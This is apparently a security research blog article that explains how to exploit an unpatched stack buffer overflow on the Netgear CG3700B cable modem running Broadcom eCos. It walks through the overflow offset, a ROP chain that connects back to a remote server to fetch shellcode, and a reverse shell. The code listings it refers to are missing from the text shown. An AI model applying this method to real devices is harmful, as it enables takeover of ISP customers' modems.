In this article I’ll introduce a methodology and corresponding techniques that you can use to exploit buffer overflows on the Broadcom variant of eCos.
I’ll demonstrate the methodology by exploiting a stack buffer overflow that affects the Netgear CG3700B device. This is a forever-day given that Netgear refused to fix it when asked by a major belgian ISP. You can read more about the bug here.
Reproducing the Bug
The buffer overflow affects the authenticated part of the device’s management web interface. A reduced test case is provided below:
Broadcom based cable modems running eCos that are deployed by ISPs run on production versions, which means they do not expose debugging stubs over TCP or serial communications (this is something that can be enabled when building eCos images, with GDB stubs exposed over serial or TCP either by the firmware itself or the Redboot hypervisor).
However, every firmware that rely on Broadcom Foundation Classes has a custom exception handler that triggers on segmentation faults. This exception handler will print out all MIPS registers, current instruction, and affected thread. Given that these devices only support one simultaneous console connection, it will be printed out on whichever interface you’re currently connected to (i.e. serial if you’re connected over UART, telnet if you’re connected over TCP).
If we send the reduced test case from above, we’ll get the following dump printed out:
As we can see, we successfully overwrote the return address with the content from our buffer (0x41414141).
Identifying Buffer Length
In order to know how much padding is required to overflow the buffer, we will use gef “pattern create” and “pattern search”.
Let’s trigger the crash with this pattern:
We see the crash happening when the executable tries to execute instruction at 0x6c616163:
We can now find the offset by searching through our pattern.
Now we know that our exploit payload will need 244 bytes of padding in order to overflow the buffer and take control of the program counter.
Designing the Exploit Chain
Given the lack of debugging abilities on this platform (with the exception of register dump on segfault), the best strategy is to craft a very small ROP chain (stage 1) that will fetch or receive a second stage that we can compile for our target. This way we don’t have to debug an overly long chain by constantly crashing/capturing output/rebooting in order to do everything via return oriented programming.
This is exactly what folks at Lyrebird did when exploiting the CableHaunt vulnerability on Sagemcom devices.
The way their exploit works is:
Hijack the return address via the overflow and start the ROP chain
The ROP chain establish a TCP connection to a remote server and save a reference to the file descriptor of this TCP connection socket at a fixed address.
The ROP chain reads shellcode from the remote server over the TCP connection and writes it in memory at a fixed address.
The ROP chain finally jumps to the shellcode first instruction
The shellcode creates a console object (similar to calling /bin/sh on Linux) and redirects IO to the file descriptor by fetching its reference from the fixed address the ROP chain used. This way, the socket that was used to fetch the shellcode will be kept open and used for the reverse shell communication.
Brilliant, right ?
Building a ROP Chain
Prerequisites
To build our ROP chain, we need to know the exact addresses of standard function within the firmware.
socket - create an endpoint for communication
connect - initiate a connection on a socket
recv - receive a message from a socket
sleep - delay for a specified amount of time
All these functions are part of standard eCos libraries bundled with the Broadcom variant. Reverse engineering firmwares to identify these functions is covered in eCos Firmware Analysis with Ghidra
We also need to choose fixed addresses in memory where we will store content. Namely:
sockfd_addr - stores a reference to the socket file descriptor
sockaddr_addr - stores a reference to a sockaddr structure
payload_buffer_addr - start address where to write shellcode
I personally always choose between two techniques: writing to the stack region of a thread where the thread’s stability will not put the device at risk (e.g. IkeThread on a device where IKE connectivity is not provided or used), or write to the lowest memory addresses within the heap region which are highly unlikely to be used by the system.
Handling Global Pointer Issues
One problem that may arise is that code will try to fetch content from or write content to memory addresses by relying on the global pointer ($gp) value while this value is corrupted due to our overflow. Say, for example, that you hit this instruction prior to actually taking control of $ra:
If the global pointer has been overwritten with ‘AAAA’, this will trigger an exception with code 5 “Address Error exception (Store)” and the device will crash because you’re trying to write to non-mapped memory.
The best yet not very elegant way of overcoming this is to pad our payload with the global pointer address. If we know the global pointer is set to 0x86cfb884, we can fill our payload array like this:
Finding Gadgets in Large Firmwares
I’m using Ropper to find gadgets but it can take a while or even hangs with large firmware files. The best way to speed up the process is to simply cut a section with dd and run Ropper on it.
Chain Design
Our objective with the ROP chain is to execute something similar to this piece of C code:
socket
Our target, like all devices running BCM33XX chipsets, run on MIPS architecture. The calling convention of MIPS is to put the first three arguments into $a0, $a1, and $a2 respectively. Remaining arguments are pushed onto the stack.
The first step is to create a socket to communicate over IPv4 (AF_INET) using TCP (SOCK_STREAM). This is the equivalent of calling socket(2, 1, 0).
To do so, we need to put the value 2 into $a0, 1 into $a1, and 0 into $a0.
Then, we need to call socket:
The MIPS calling convention also defines a register for return values: $v0. So once we return from calling socket, $v0 holds our file descriptor (an integer) and we need to save it somewhere in memory otherwise the trick of “the reverse shell will use the same channel when loading” will not work.
connect
So $a0 is already set to contain our sockfd, we just need to put the right values in $a1 and $a2.
To setup our sockaddr struct into $a1, we first need to understand that struct.
The structure is better represented by the diagram below:
Here we have a problem because AF_INET must be equal to \x00\x02, which means holding a null byte. We cannot transfer null bytes in our payload because that would mean terminating the string, so we need to do some manipulation first.
The idea is to re-use data from the mapped firmware. We just have to identify a location in memory that starts with \x00\x02, the only caveat is that the TCP port it will connect to is arbitrary, corresponding to the two bytes that follow.
For this ROP chain, I’m using data from address 0x80010368, which means the TCP port will be 5504 (0x1580):
If you’re limited by firewall rules, the Python script below will help you find all occurences in a given firmware and corresponding TCP port so you can select what works best for you.
Of course nothing blocks us from overwriting the value next to \x00\x02, but we have to be 100% sure that we are not patching instructions that would lead to the device crashing at some point.
The chain is explained in comments:
recv
Now it’s time to receive our second stage. We do so by calling recv while using the same sockfd reference, and a pointer to payload_buffer_addr, the fixed address we chose to save the shellcode in memory. I chose a length of 0x400 but feel free to choose anything else as long as it is larger than your shellcode size. The flags argument can be zero.
sleep
MIPS processor have an instruction cache and a data cache. The instruction cache can contain instructions that differs from the instructions stored in memory, causing so-called “cache incoherencies”.
I won’t cover the details here, just remember that we need to call sleep to sync the caches. The gadgets I’m using below will make the execution sleep for two seconds.
pivot
Finally, we have our second stage shellcode saved at a fixed memory address, we synced the caches, we’re ready to jump to shellcode.
ROP Chain Reproduction
One interesting side effects of different firmwares being based on the same version of eCos (with the same libraries and constructs) is that we can be 99.9% sure that if we find a gadget in one firmware it will be present in all the others.
Knowing this, we could imagine a tool that auto-generates a ROP chain given a firmware file and a buffer length.
Serving the Payload
We can rely on pwntools to serve the second stage. The script below is directly inspired from Lyrebird code to exploit Sagemcom F@st 3890 (source).
Nothing too complex here. When the server receives the callback from our ROP chain, it returns the content from the file ‘exploit.raw’ (the second stage) and switch to interactive mode.
Conclusion
In this article we covered how to exploit stack buffer overflows on the Broadcom variant of eCos. We learned how to reproduce a bug, identify the exact buffer length, and build a complete ROP chain manually.
In the process we learned a few tricks to overcome some limitations such as analyzing large firmware files with Ropper or setting up sockaddr structure by re-using existing bytes from memory.